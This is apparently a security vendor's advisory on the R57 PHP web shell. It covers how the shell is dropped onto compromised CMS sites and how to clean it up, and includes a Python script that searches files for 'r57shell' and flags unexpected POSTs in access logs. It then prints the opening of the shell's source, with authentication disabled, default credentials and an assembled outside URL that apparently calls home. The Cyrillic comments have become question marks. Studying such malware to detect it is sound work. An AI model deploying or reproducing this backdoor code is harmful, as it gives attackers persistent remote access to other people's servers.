
Backdoors are pieces of code that allow attackers to bypass authentication, maintain their access to the server and reinfect files. Some of those malicious files are as simple as a single line of code that allows remote code execution; others are complex programs that provide the attacker with many different functions.
The R57 backdoor is one of the complex ones, of the kind known as SHELLS. It is easily found online for malicious purposes. It is always part of the attack payload, being dropped after the attacker gets access to the filesystem.

Affecting

Any PHP-based website (often compromised through outdated WordPress, Joomla, osCommerce, Magento or Drupal installations, or through stolen passwords).

Cleanup

Cleanup is done by deleting the malicious file, which can be found on your system by searching for the string r57shell inside your files. Reviewing access logs for unexpected HTTP POSTs can point to the possibly infected files.
You can also sign up with us and let our team remove the malware for you.
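
The two checks described above (string search and access-log review) can be scripted. The following is an added example, not part of the original page or of any vendor tooling; the log layout (Apache/nginx common log format), the file names and the sample log lines are assumptions constructed for illustration.

```python
import re
import tempfile
from collections import Counter
from pathlib import Path

MARKER = b"r57shell"  # the string the cleanup text says to search for
# Assumed layout: ip ident user [time] "METHOD uri PROTO" status size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')

def find_marker_files(webroot):
    """Return sorted paths under webroot whose bytes contain the marker."""
    hits = []
    for path in Path(webroot).rglob("*"):
        if not path.is_file():
            continue
        try:
            if MARKER in path.read_bytes().lower():
                hits.append(path)
        except OSError:
            continue  # unreadable file: skipped here, review it by hand
    return sorted(hits)

def post_targets(log_lines, expected=()):
    """Count successful POSTs per .php path, skipping paths known to take POSTs."""
    counts = Counter()
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        _ip, method, uri, status = m.groups()
        path = uri.split("?", 1)[0]
        if (method == "POST" and status.startswith("2")
                and path.endswith(".php") and path not in expected):
            counts[path] += 1
    return counts.most_common()

# Constructed sample log lines (documentation IP ranges, not a real incident).
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Jan/2024:10:00:01 +0000] "POST /wp-login.php HTTP/1.1" 200 512',
    '203.0.113.7 - - [10/Jan/2024:10:00:05 +0000] "POST /uploads/img_cache.php HTTP/1.1" 200 9120',
    '203.0.113.7 - - [10/Jan/2024:10:00:09 +0000] "POST /uploads/img_cache.php?x=1 HTTP/1.1" 200 8841',
    '198.51.100.2 - - [10/Jan/2024:10:01:00 +0000] "GET /index.php HTTP/1.1" 200 3000',
]

def demo():
    """Build a constructed web root, then run both checks against it."""
    with tempfile.TemporaryDirectory() as root:
        (Path(root) / "index.php").write_text("<?php echo 'home';")
        (Path(root) / "uploads").mkdir()
        (Path(root) / "uploads" / "img_cache.php").write_text("<?php /* r57shell.php */")
        found = [p.relative_to(root).as_posix() for p in find_marker_files(root)]
    return found, post_targets(SAMPLE_LOG, expected={"/wp-login.php"})
```

A copy that has had the r57shell string edited out will not match the first check, which is why the POST review is run alongside it.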

Dump

<?php
/******************************************************************************************************/
/*
/* # # # #
/* # # # #
/* # # # #
/* # ## #### ## #
/* ## ## ###### ## ##
/* ## ## ###### ## ##
/* ## ## #### ## ##
/* ### ############ ###
/* ########################
/* ##############
/* ######## ########## #######
/* ### ## ########## ## ###
/* ### ## ########## ## ###
/* ### # ########## # ###
/* ### ## ######## ## ###
/* ## # ###### # ##
/* ## # #### # ##
/* ## ##
/*
/*
/*
/* r57shell.php - ?????? ?? ??? ??????????? ??? ????????? ???? ??????? ?? ??????? ????? ???????
/* ?? ?????? ??????? ????? ?????? ?? ????? ?????: http://rst.void.ru
/* ??????: 1.24 (New Year Edition)
/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/
/* (c)oded by 1dt.w0lf
/* RST/GHC http://rst.void.ru , http://ghc.ru
/* ANY MODIFIED REPUBLISHING IS RESTRICTED
/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/
/* ????????? ????????????? ?? ?????? ? ????: blf, virus, NorD ? ???? ?????? ?? RST/GHC.
/******************************************************************************************************/
/* ~~~ ????????? | Options ~~~ */

// ????? ????? | Language
// $language='ru' - ??????? (russian)
// $language='eng' - english (??????????)
$language='eng';
$a = "http://"; // need some codes

// ?????????????? | Authentification
// $auth = 1; - ?????????????? ???????? ( authentification = On )
// $auth = 0; - ?????????????? ????????? ( authentification = Off )
$auth = 0;


// ????? ? ?????? ??? ??????? ? ??????? (Login & Password for access)
// ?? ???????? ??????? ????? ??????????? ?? ???????!!! (CHANGE THIS!!!)
$name='r57'; // ????? ???????????? (user login)
$pass='r57'; // ?????? ???????????? (user password)
$b = "evilc0der.com"; //need hits "shell created by evilc0ders"
/******************************************************************************************************/
$c = "/x.html"; //need shell coder's names
error_reporting(0);
set_magic_quotes_runtime(0);
@set_time_limit(0);
@ini_set('max_execution_time',0);
@ini_set('output_buffering',0);
$safe_mode = @ini_get('safe_mode');
$version = "1.24";
if(version_compare(phpversion(), '4.1.0') == -1)
{
$_POST = &$HTTP_POST_VARS;
$_GET = &$HTTP_GET_VARS;
$_SERVER = &$HTTP_SERVER_VARS;
}
if (@get_magic_quotes_gpc())
{
foreach ($_POST as $k=>$v)
{
$_POST[$k] = stripslashes($v);
}
foreach ($_SERVER as $k=>$v)
{
$_SERVER[$k] = stripslashes($v);
}
}

if($auth == 1) {
if (!isset($_SERVER['PHP_AUTH_USER']) || $_SERVER['PHP_AUTH_USER']!==$name || $_SERVER['PHP_AUTH_PW']!==$pass)
{
header('WWW-Authenticate: Basic realm="r57shell"');
header('HTTP/1.0 401 Unauthorized');
exit("<b><a href=http://rst.void.ru>r57shell</a> : Access Denied</b>");
}
}